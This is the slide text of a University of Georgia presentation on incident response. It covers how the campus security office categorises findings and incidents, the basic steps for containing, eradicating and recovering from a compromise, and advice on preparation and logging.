Incident Response How to respond to computer security incidents at UGA

1
Incident ResponseHow to respond to computer
security incidents at UGA

• Jesse Bowling
• Incident Response Manager
• EITS - Office of Information Security
• University of Georgia

2
The Situation

• Six Infosec staff, 50000 devices
• Current projects include
• Endpoint security, Vulnerability management,
  SATE, Risk Assesment, SOC, Incident Response
• How do we handle it?
• We work with you as much as possible!

3
What wont we do?

• Point fingers
• Administer your box for you
• Be inflexible or insensitive to your unit
  requirements
• Drink Habu Sake

4
What will we do?

• Provide vulnerability scans
• Furnish IPS and network/device logs of suspicious
  activity
• Tool recommendations
• Turn off network access if affected system is
  actively attacking others

5
What else will we do?

• Provide a remediation plan
• Recommendations for securing your environment
• Liaise with Legal Affairs and outside entities

6
Findings, Incidents, and Critical Incidents

• Oh My!

7
Categorizations

• Finding
• Incident
• Critical Incident

8
Finding

• A finding is a vulnerability or exposure without
  evidence of actual exploitation
• Nexpose reports fall into this category
• Sensitive data with more access than required for
  business
• New vulnerability in software you use

9
Incident

• A failure, loss, breach, or degradation of a
  service or a system that you support.
• Virus outbreak on lab machine(s)
• Warez server on machine with no sensitive info
• Nachi infected machine
• DOS of a non-critical service or machine

10
Critical Incident

• Major service outage such as main web server,
  email service, etc.
• Might make the papers
• Poses financial risk or actual financial loss
• Affects a large number of stakeholders

11
Critical Incident cont.

• Identity theft of an individual or group
• Unauthorized disclosure, modification,
  destruction or deletion of sensitive information
  or data

12
Potential sensitive information

• https//infosec.uga.edu/sate/sensitive.php
• Social Security Numbers
• Driver's license numbers
• Credit card numbers or bank account numbers with
  associated PIN
• Legislatively protected data
• Business related data such as payroll, etc
• Many more!

13
(No Transcript)
14
General Response Steps

• Identify
• Contain
• Eradicate
• Recover
• Follow up

15
Identify

• Please give as much information as possible to
  the EITS Helpdesk
• IP addresses? sensitive data? critical system?
• Scope, duration, contacts in the department
• We use several tools to detect incidents
  including
• IPS, Packet Shapers, External reports

16
Contain

• Unplug from the network if possible
• Filter ingress and egress on firewall
• Shut down affected service
• Beware changes
• Changes can destroy evidence of compromise
• If case may involve law enforcement

17
Eradicate

• Reimage/reinstall if possible
• Make sure to patch!
• Restore from known good backup
• Patch!
• Use multiple virus/malware scanners
• Manually

18
Recover

• UmmmPatch!
• Implement tougher firewall rules
• Lock down/disable services
• Increase your logging
• Risk assesment
• Remove risk you dont need

19
Follow Up

• Let us know what happened
• We need stats
• Problem might be campus wide
• Helps us tune our tools
• Post-mortem
• What went wrong? What has been done to correct?
  How can we catch earlier?

20
The Missing Step

• Is also the most important
• PREPARE!

21
Preparation

• Identify critical assets and servers
• Patch quickly and often
• Backup, verify, and keep offsite copies
• Have good procedures and follow them
• Keep up to date with current threats
• http//www.sans.org/newsletters/

22
Preparation cont.

• Invest in firewalls and even an IPS
• Ensure youre logging (centrally)
• 1) Access through Existing Accounts
• 2) Failed File or Resource Access Attempts
• 3) Unauthorized Changes to Users,Groups and
  Services
• 4) Systems Most Vulnerable to Attack
• 5) Suspicious or Unauthorized Network Traffic
  Patterns
• You cant protect what you cant see!

23
Tools

• Sans lists free tools here
• https//www.sans.org/resources/vendor_directory/
• Infosec tool list here
• https//infosec.uga.edu/sate/tools.php

24
Questions?

• What tools do you use for auditing, log
  collection, malware removal, network monitoring?
• What content did you like in this presentation?
  Dislike? Whats missing?

25
Thank You!

• Jesse Bowling
• Incident Response Manager
• EITS - Office of Information Security
• University of Georgia